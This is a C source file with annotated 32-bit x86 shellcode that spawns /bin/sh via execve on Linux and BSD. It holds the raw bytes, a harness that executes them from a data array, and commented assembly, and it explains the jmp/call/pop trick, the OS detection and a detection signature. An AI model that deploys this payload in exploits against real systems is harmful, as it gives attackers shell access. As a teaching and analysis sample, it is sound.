/* * execve /bin/sh * * Linux and *bsd. * * Copyright (c) 2003 Alberto Ornaghi * * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
 */

/*
 * Hand-encoded 32-bit x86 machine code.  It decodes to the body of
 * shell_multi() below: \xeb\x24 is the short jmp forward, \x5b pop %ebx,
 * \x31\xc0 xor %eax,%eax, \xcd\x80 int $0x80 and \xe8\xd7\xff\xff\xff the
 * backward call (rel32 -0x29) that lands on the pop.  Both displacements are
 * hard-coded, so any edit to shell_multi() has to be re-encoded here by hand;
 * nothing in the file checks that the two stay in sync.  The trailing
 * "/bin/sh" gets its NUL from the array's implicit terminator.  From a
 * detection standpoint, a "/bin/sh" literal adjacent to int $0x80 with
 * %al = 0xb/0x3b is the textbook execve-shellcode signature.
 */
char multishell[] =
    "\xeb\x24\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x89\x43\x0c\x8d\x53"
    "\x0c\x8d\x4b\x08\x8c\xe0\x21\xc0\x74\x04\xb0\x3b\xeb\x02\xb0\x0b"
    "\x52\x51\x53\x53\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

/*
 * Runs the bytes in-process: the data array is cast to a function pointer
 * and called.  Converting an object pointer to a function pointer is not
 * defined by ISO C (it is a common extension).  multishell lives in
 * writable data, and the code also writes into its own string, so the page
 * must be both writable and executable; on toolchains/kernels that enforce
 * W^X (non-executable .data) this call faults before the first instruction.
 * argc/argv are unused.  f() is not expected to return because execve
 * replaces the process image; the missing return statement is only valid
 * for main() since C99.
 */
int main(int argc, char **argv) {
    void (*f)(void) = (void (*)(void))multishell;
    f();
}

/*
 * Readable source of the byte string above; not called anywhere in this
 * file, it documents what the bytes do.  32-bit only (%ebx/%ecx/%edx and the
 * int $0x80 entry), so it needs a 32-bit build.  The jmp / call / pop %ebx
 * trio leaves the address of the "/bin/sh" literal in %ebx and everything
 * else is addressed off it.  Note the stores at offsets 7, 8 and 12 land in
 * that literal: as a real function the literal sits in .text, which is not
 * writable, so calling shell_multi() directly would fault on the first store.
 */
void shell_multi(void) {
    __asm__(
        " jmp string_addr \n"
        " after_jmp: \n"
        /* %ebx = address of "/bin/sh", pushed by the call at string_addr */
        " pop %ebx \n"
        " xorl %eax, %eax \n"           /* %eax = 0; source of the NUL/NULL below */
        " movl %ebx, 0x8(%ebx) \n"      /* [ebx+8]  = pointer to "/bin/sh" (argv[0]) */
        " movb %al, 0x7(%ebx) \n"       /* [ebx+7]  = NUL terminator of the string */
        " movl %eax, 0xc(%ebx) \n"      /* [ebx+12] = NULL (argv[1], doubles as envp[0]) */
        " lea 0xc(%ebx), %edx \n"       /* %edx = envp (points at the NULL word) */
        " lea 0x8(%ebx), %ecx \n"       /* %ecx = argv */
        /* OS detection: a zero %fs selector is treated as Linux, anything
         * else as BSD.  NOTE(review): whether that distinction still holds
         * on current kernels is not verified here. */
        " movl %fs, %eax \n"
        " and %eax, %eax \n"
        " je linux \n"
        " movb $0x3b, %al \n"           /* syscall 59: BSD execve */
        " jmp bsd \n"
        " linux: \n"
        " movb $0xb, %al \n"            /* syscall 11: Linux execve */
        " bsd: \n"
        /* Stack-passed arguments for the BSD convention: envp, argv, path,
         * plus one extra word filling the return-address slot.  Linux reads
         * %ebx/%ecx/%edx instead and ignores the stack. */
        " push %edx \n"
        " push %ecx \n"
        " push %ebx \n"
        " push %ebx \n"
        " int $0x80 \n"
        /* If the syscall returns (execve failed), execution falls straight
         * into the call below and the whole sequence repeats. */
        " string_addr: \n"
        " call after_jmp \n"
        " .string \"/bin/sh\" \n"
    );
}